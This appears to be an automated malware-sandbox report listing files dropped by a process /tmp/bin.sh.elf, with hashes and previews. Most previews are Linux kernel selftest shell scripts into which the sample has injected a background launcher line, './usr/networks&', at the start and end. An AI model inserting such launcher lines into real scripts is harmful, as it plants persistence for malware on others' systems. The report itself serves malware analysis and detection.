                                                                  Preview:./usr/networks&...exit $ksft_skip..fi...echo 3 > /proc/sys/vm/drop_caches..echo $(( $hpages_needed + $nr_hugepgs )) > /proc/sys/vm/nr_hugepages..while read name size unit; do...if [ "$name" = "HugePages_Free:" ]; then....freepgs=$size...fi..done < /proc/meminfo.fi..#.# If still not enough huge pages available, exit. But, give back any huge.# pages potentially allocated above..#.if [ $freepgs -lt $hpages_test ]; then..# nr_hugepgs non-zero only if we attempted to increase..if [ -n "$nr_hugepgs" ]; then...echo $nr_hugepgs > /proc/sys/vm/nr_hugepages..fi..printf "Not enough huge pages available (%d < %d)\n" \...$freepgs $needpgs..exit $ksft_skip.fi..#.# Run the hugetlbfs test.#../memfd_test hugetlbfs../run_fuse_test.sh hugetlbfs..#.# Give back any huge pages allocated for the test.#.if [ -n "$nr_hugepgs" ]; then..echo $nr_hugepgs > /proc/sys/vm/nr_hugepages.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):6085
                                                                  Entropy (8bit):5.222118071271236
                                                                  Encrypted:false
                                                                  SSDEEP:96:PS6opte4QrOTqSdLAdJ8OqtVnQWohfmDSohOHvrkd:PSDpte/rO+ShAEO+nQWohfmDSohOHvrg
                                                                  MD5:BC65EE02174F25DA47F67048EE476ECC
                                                                  SHA1:5A0F574368D948305FDD7B560F4AC9F0EB22FB41
                                                                  SHA-256:6487CEF33AA91CA38A6A8C7CE93308E0EF68A267DC99EA1715165661AF3DFBBA
                                                                  SHA-512:1F041350A2F4A632F658B83FE6AD7E8FACF3F69E888FC8C1BE0A5D6044A120648736432950D9A407C59322776B61AF30C0850687E8E634710DA90EF71D6C1420
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit $ksft_skip..fi...SYSFS=`mount -t sysfs | head -1 | awk '{ print $3 }'`...if [ ! -d "$SYSFS" ]; then...echo $msg sysfs is not mounted >&2...exit $ksft_skip..fi...if ! ls $SYSFS/devices/system/memory/memory* > /dev/null 2>&1; then...echo $msg memory hotplug is not supported >&2...exit $ksft_skip..fi...if ! grep -q 1 $SYSFS/devices/system/memory/memory*/removable; then...echo $msg no hot-pluggable memory >&2...exit $ksft_skip..fi.}..#.# list all hot-pluggable memory.#.hotpluggable_memory().{..local state=${1:-.\*}...for memory in $SYSFS/devices/system/memory/memory*; do...if grep -q 1 $memory/removable &&... grep -q $state $memory/state; then....echo ${memory##/*/memory}...fi..done.}..hotpluggable_offline_memory().{..hotpluggable_memory offline.}..hotpluggable_online_memory().{..hotpluggable_memory online.}..memory_is_online().{..grep -q online $SYSFS/devices/system/memory/memory$1/state.}..memory_is_offline().{..grep -q offline $SYSFS/devices/system/memory/memory
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):59
                                                                  Entropy (8bit):4.140763389477654
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVasWoWbPDXVOORgn:6W9Mn
                                                                  MD5:0A5C7A75059C630EEFC22C6F180442A8
                                                                  SHA1:D8EB51C2C827DA1D4F2A859EF36F294D1AF38842
                                                                  SHA-256:7657F8B81C1CFB82399BB4E53F4F23EDC7E0F2F281F4C1569DF650D731ECC4D6
                                                                  SHA-512:214F4D17D813CA80185D1535D611CAE7A1B2DCD0AD9D09C1B2E01D882C6B752CAE6AB5AD96C36E1B5B2236EC3540A1537B818C726BD1C92B9419BAE087EE0825
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):81828
                                                                  Entropy (8bit):5.22489764897402
                                                                  Encrypted:false
                                                                  SSDEEP:768:DP0urh05CFq1eoIvEG7tS9WYiUnOrSNlMcFZAP4j7w22q8r4ajdxaCyqb6XUuHu2:DrO5JUcHVX+VKr
                                                                  MD5:F2F9319BD4E69A0A7C78AFF8875729C4
                                                                  SHA1:AEC8DF0552658E8EC9CB9814F5DBEE4CAE3FEF96
                                                                  SHA-256:2195F36873CB8AAC5278E53D0B94DCA5EB074A57AF51B1E20D8CF955050458BC
                                                                  SHA-512:BB09F77E16941C6F2F869ABE3F8A93E4AC6A905293D0C9F37B2D0AA8F3498D9A5529774644AB9B5C2E36A8256938164690725E72D8C2ECACB6093E131EAFD9C9
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi...if [ "${PAUSE}" = "yes" ]; then...echo...echo "hit enter to continue, 'q' to quit"...read a...[ "$a" = "q" ] && exit 1..fi...kill_procs.}..log_test_addr().{..local addr=$1..local rc=$2..local expected=$3..local msg="$4"..local astr...astr=$(addr2str ${addr})..log_test $rc $expected "$msg - ${astr}".}..log_section().{..echo..echo "###########################################################################"..echo "$*"..echo "###########################################################################"..echo.}..log_subsection().{..echo..echo "#################################################################"..echo "$*"..echo.}..log_start().{..# make sure we have no test instances running..kill_procs...if [ "${VERBOSE}" = "1" ]; then...echo...echo "#######################################################"..fi.}..log_debug().{..if [ "${VERBOSE}" = "1" ]; then...echo...echo "$*"...echo..fi.}..show_hint().{..if [ "${VERBOSE}" = "1" ]; then.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):10482
                                                                  Entropy (8bit):5.520140277320042
                                                                  Encrypted:false
                                                                  SSDEEP:192:Hf6aoUuW2v/DNRoEMUHR+4X4jEdfIok/CJY/JGgU:Cvr8EMWK/Mz
                                                                  MD5:A772B76FFC1B6AB09E9DCD0B874EB213
                                                                  SHA1:66C9D16185128FF2EAB98556B1E8B617678A4353
                                                                  SHA-256:516D962A6E31A455D259BF052DC7E76964126336632243DBFECCB766629A4523
                                                                  SHA-512:869FF3072689E0602B00DD74E561E28FFDC6DD8914EB07D460605977F1968BDC6E83475A27B4494363FACFDBF587568BC4733722575DC2E485174012472B0FF0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi.}..log_section().{..echo..echo "######################################################################"..echo "TEST SECTION: $*"..echo "######################################################################".}..log_subsection().{..echo..echo "#########################################"..echo "TEST SUBSECTION: $*".}..run_cmd().{..local cmd="$*"..local out..local rc...if [ "$VERBOSE" = "1" ]; then...printf " COMMAND: $cmd\n"..fi...out=$(eval $cmd 2>&1)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo " $out"..fi...[ "$VERBOSE" = "1" ] && echo...return $rc.}..get_linklocal().{..local dev=$1..local pfx..local addr...addr=$(${pfx} ip -6 -br addr show dev ${dev} | \..awk '{...for (i = 3; i <= NF; ++i) {....if ($i ~ /^fe80/).....print $i...}..}'..)..addr=${addr/\/*}...[ -z "$addr" ] && return 1...echo $addr...return 0.}..################################################################################.#..setup().{..echo..echo "
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):5033
                                                                  Entropy (8bit):5.199543662874075
                                                                  Encrypted:false
                                                                  SSDEEP:96:gcg5COx54mZEExrIKSw0Y/EYNYaB6FCAOTTXs+bFNZlM:0L7rIgnhbJM
                                                                  MD5:616700222685088C7BE53E46E671009B
                                                                  SHA1:01592A677B04EA088572BD7517BE85FCC67F9DDA
                                                                  SHA-256:BF687114D57F8773EFFE0B21D228D9FDD436F3C4CCA8C8A78F7349CA0D465D3D
                                                                  SHA-512:D66A46C098F6A6D08B904D2A7EDFCCF1E3622C1BD1FAA010578C33444B7C49A7D86A3197BBA32DE98683AFC2CDE7BD67357C2E00BA7DA2FBEDDEC9D3815A4073
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi...[ "$VERBOSE" = "1" ] && echo.}..run_cmd().{..local cmd="$*"..local out..local rc...if [ "$VERBOSE" = "1" ]; then...echo "COMMAND: $cmd"..fi...out=$(eval $cmd 2>&1)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo "$out"..fi...[ "$VERBOSE" = "1" ] && echo...return $rc.}..################################################################################.# config..create_ns().{..local ns=${1}...ip netns del ${ns} 2>/dev/null...ip netns add ${ns}..ip -netns ${ns} addr add 127.0.0.1/8 dev lo..ip -netns ${ns} link set lo up...ip netns exec ${ns} sysctl -q -w net.ipv6.conf.all.keep_addr_on_down=1..case ${ns} in..h*)...ip netns exec $ns sysctl -q -w net.ipv6.conf.all.forwarding=0...;;..r*)...ip netns exec $ns sysctl -q -w net.ipv4.ip_forward=1...ip netns exec $ns sysctl -q -w net.ipv6.conf.all.forwarding=1...;;..esac.}..setup().{..local ns..local i...#set -e...for ns in h0 r1 h1 h2 h3..do...create_ns ${ns}..done...#..# create interc
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):30358
                                                                  Entropy (8bit):5.149225654380326
                                                                  Encrypted:false
                                                                  SSDEEP:768:Yc/Gl3JcQwm5jmA+Yfd+tdUaGPVkcnPJ5qmd+ZnJY/b7Bf7hMehv5cRTbicH3d:YciyIj5BnO3d
                                                                  MD5:A5578A1F1D8156012B4F6A0F1A620383
                                                                  SHA1:D04ABFB2D2B5DF70BB011BFF87D48F07BC81BDB9
                                                                  SHA-256:0BBA5B1308425F707409D81F17052E2724A05DE82BA72D4C43BE74214306C244
                                                                  SHA-512:C84CCF52747762F97B9A328271BF183B7BF9CF3809D9727ED6570F79E6962B4C0055919E65CD3D041501AED2F053135A38CC6BA8CE26EF4F016E69BFFCC639C8
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi...if [ "${PAUSE}" = "yes" ]; then...echo...echo "hit enter to continue, 'q' to quit"...read a...[ "$a" = "q" ] && exit 1..fi...[ "$VERBOSE" = "1" ] && echo.}..run_cmd().{..local cmd="$1"..local out..local stderr="2>/dev/null"...if [ "$VERBOSE" = "1" ]; then...printf "COMMAND: $cmd\n"...stderr=..fi...out=$(eval $cmd $stderr)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo " $out"..fi...return $rc.}..get_linklocal().{..local dev=$1..local ns..local addr...[ -n "$2" ] && ns="-netns $2"..addr=$(ip $ns -6 -br addr show dev ${dev} | \..awk '{...for (i = 3; i <= NF; ++i) {....if ($i ~ /^fe80/).....print $i...}..}'..)..addr=${addr/\/*}...[ -z "$addr" ] && return 1...echo $addr...return 0.}..create_ns().{..local n=${1}...ip netns del ${n} 2>/dev/null...set -e..ip netns add ${n}..ip netns set ${n} $((nsid++))..ip -netns ${n} addr add 127.0.0.1/8 dev lo..ip -netns ${n} link set lo up...ip netns exec ${n} sysctl -qw net.ipv4.ip_forw
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):5253
                                                                  Entropy (8bit):5.126957311810008
                                                                  Encrypted:false
                                                                  SSDEEP:96:gNHKMcy4LOgbCQgdqvcY25tOdSg1cgoirS3sJ/7:0TVXKc1DOdHT
                                                                  MD5:4BB9EDAA670B1D47E0EC11BE4B08E4DE
                                                                  SHA1:46D0CD00582D9B173A126C54088E2C5B196517E4
                                                                  SHA-256:5CB74C5B7C9F001C056C13B2C3E4630AF06BFC1D913A0C4AF8DE8DCF67BC4D54
                                                                  SHA-512:C849D92A643332819FB9AA4040418A00F5D28F0BC91EF1605C36822BA4675E2FE374D13681772726B78C01248002050750A140B2E6FB767B6AB65F8A517F65D5
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi.}..log_section().{..echo..echo "######################################################################"..echo "TEST SECTION: $*"..echo "######################################################################".}..setup().{..set -e..ip netns add testns..$IP link set dev lo up...$IP link add dummy0 type dummy..$IP link set dev dummy0 up..$IP address add $DEV_ADDR/24 dev dummy0..$IP -6 address add $DEV_ADDR6/64 dev dummy0...ip netns exec testns sysctl -w net.ipv4.ip_forward=1...set +e.}..cleanup().{..$IP link del dev dummy0 &> /dev/null..ip netns del testns.}..fib_check_iproute_support().{..ip rule help 2>&1 | grep -q $1..if [ $? -ne 0 ]; then...echo "SKIP: iproute2 iprule too old, missing $1 match"...return 1..fi...ip route get help 2>&1 | grep -q $2..if [ $? -ne 0 ]; then...echo "SKIP: iproute2 get route too old, missing $2 match"...return 1..fi...return 0.}..fib_rule6_del().{..$IP -6 rule del $1..log_test $? 0 "rule6 del $1".}..fib_rul
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):46643
                                                                  Entropy (8bit):5.263617494795865
                                                                  Encrypted:false
                                                                  SSDEEP:384:DDi8S2/plzp/TGatEWrT5MZHwkIHTsjPhESASVzinGn52NOx9LIFnkxPJEouSGS3:3TS2/pld/TZn5MZ0NnGn52CMe5moFVt
                                                                  MD5:141675E73A6FF4B0DB5517E32B2C937F
                                                                  SHA1:4435B3658279F13DB9398EB099E4ED8BDA6A3B92
                                                                  SHA-256:C37270657F24ECCCE102B62A059BB54DA0E0AD42F65AAB7DC200E0FA8ACD0E04
                                                                  SHA-512:80A7072F287174993DEC83302550ABED16EC59EB287A6E302A8DA67FE0CA1B9F80474DD466D1889BC9A21761E730FF82B1C08D3EB196E1C71F8315C849B53E66
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi...if [ "${PAUSE}" = "yes" ]; then...echo...echo "hit enter to continue, 'q' to quit"...read a...[ "$a" = "q" ] && exit 1..fi.}..setup().{..set -e..ip netns add ns1..ip netns set ns1 auto..$IP link set dev lo up..ip netns exec ns1 sysctl -qw net.ipv4.ip_forward=1..ip netns exec ns1 sysctl -qw net.ipv6.conf.all.forwarding=1...$IP link add dummy0 type dummy..$IP link set dev dummy0 up..$IP address add 198.51.100.1/24 dev dummy0..$IP -6 address add 2001:db8:1::1/64 dev dummy0..set +e..}..cleanup().{..$IP link del dev dummy0 &> /dev/null..ip netns del ns1..ip netns del ns2 &> /dev/null.}..get_linklocal().{..local dev=$1..local addr...addr=$($IP -6 -br addr show dev ${dev} | \..awk '{...for (i = 3; i <= NF; ++i) {....if ($i ~ /^fe80/).....print $i...}..}'..)..addr=${addr/\/*}...[ -z "$addr" ] && return 1...echo $addr...return 0.}..fib_unreg_unicast_test().{..echo..echo "Single path route test"...setup...echo " Start point"..$IP route ge
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):7257
                                                                  Entropy (8bit):5.29120251291897
                                                                  Encrypted:false
                                                                  SSDEEP:192:b93vnWMdBXmlHwYLHqiJ5a0fB4w5DBmKsJ+9qb4Nx4oQDW4T:pfTdBXmlHwYLKilVhsJ+kMhY
                                                                  MD5:9BFA82C4B02F53428ED7167F9F56A2A1
                                                                  SHA1:5DC8640CCA18426FC7359A0764AD13C3F6DA8432
                                                                  SHA-256:C49AC671BB80966BCDAE01B0746826AB5DC07EB427A3CF45103D409D3E241942
                                                                  SHA-512:1BA3BC90A1BD945ECA85172E50E980F7945EDC030FB0139172A1A49435C4B24DE8941B93623277EDD42AE139A67DB6336970812F348B8646EBA6EA60C8A687B7
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..fi..if [[ "$(echo $DEVLINK_DEV | grep -c pci)" -eq 0 ]]; then...echo "SKIP: devlink device's bus is not PCI"...exit 1..fi...DEVLINK_VIDDID=$(lspci -s $(echo $DEVLINK_DEV | cut -d"/" -f2) \.... -n | cut -d" " -f3).fi..##############################################################################.# Sanity checks..devlink help 2>&1 | grep resource &> /dev/null.if [ $? -ne 0 ]; then..echo "SKIP: iproute2 too old, missing devlink resource support"..exit 1.fi..devlink help 2>&1 | grep trap &> /dev/null.if [ $? -ne 0 ]; then..echo "SKIP: iproute2 too old, missing devlink trap support"..exit 1.fi..##############################################################################.# Devlink helpers..devlink_resource_names_to_path().{..local resource..local path=""...for resource in "${@}"; do...if [ "$path" == "" ]; then....path="$resource"...else....path="${path}/$resource"...fi..done...echo "$path".}..devlink_resource_get().{..local name=$1..local resource_name=.[][\"$DEV
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
